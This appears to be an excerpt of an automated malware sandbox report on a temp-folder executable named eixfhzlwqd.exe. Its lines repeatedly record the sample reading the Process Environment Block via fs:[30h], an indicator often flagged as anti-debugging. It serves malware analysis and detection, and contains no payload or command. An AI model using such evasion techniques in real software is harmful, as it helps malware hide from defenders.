Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h] 3_2_00A29080
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h] 3_2_00AA3884
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h] 3_2_00AA3884
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h] 3_2_00A258EC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h] 3_2_00AF4015
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h] 3_2_00AF4015
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h] 3_2_00AF1074
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h] 3_2_00AE2073
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h] 3_2_00A40050
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h] 3_2_00A40050
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h] 3_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h] 3_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h] 3_2_00AA69A6
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h] 3_2_00A5A185
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h] 3_2_00A4C182
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h] 3_2_00A52990
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h] 3_2_00AB41E8
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h] 3_2_00A5513A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h] 3_2_00A5513A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h] 3_2_00A2C962
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h] 3_2_00A2B171
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h] 3_2_00A2B171
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h] 3_2_00A4B944
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h] 3_2_00A4B944
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h] 3_2_00A252A5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A3AAB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A3AAB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A5FAB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h] 3_2_00A5D294
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h] 3_2_00A5D294
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A52AE4
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h] 3_2_00A52ACB
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h] 3_2_00A64A2C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h] 3_2_00A64A2C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h] 3_2_00A38A0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h] 3_2_00A25210
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A2AA16
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A2AA16
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h] 3_2_00A43A1C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h] 3_2_00ADB260
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h] 3_2_00ADB260
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AF8A62
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h] 3_2_00A6927A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h] 3_2_00A29240
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h] 3_2_00AEEA55
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h] 3_2_00AB4257
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h] 3_2_00A54BAD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF5BA5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h] 3_2_00AE138A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h] 3_2_00A31B8F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h] 3_2_00A31B8F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h] 3_2_00ADD380
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h] 3_2_00A52397
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h] 3_2_00A5B390
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h] 3_2_00A503E2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A4DBE9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h] 3_2_00AA53CA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h] 3_2_00AA53CA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h] 3_2_00AE131B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00A2DB60
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h] 3_2_00A53B7A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h] 3_2_00A53B7A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h] 3_2_00A2DB40
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AF8B58
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h] 3_2_00A2F358
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h] 3_2_00A3849B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h] 3_2_00AE14FB
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h] 3_2_00AA6CF0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AF8CD6
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A5BC2C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h] 3_2_00AA6C0A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h] 3_2_00AF740D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AE1C06
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h] 3_2_00A4746D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h] 3_2_00A5A44B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h] 3_2_00ABC450
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h] 3_2_00ABC450
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h] 3_2_00AF05AC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h] 3_2_00AF05AC
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h] 3_2_00A535A1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A51DB5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h] 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A5FD9B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A5FD9B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AD8DF1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h] 3_2_00A2AD30
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
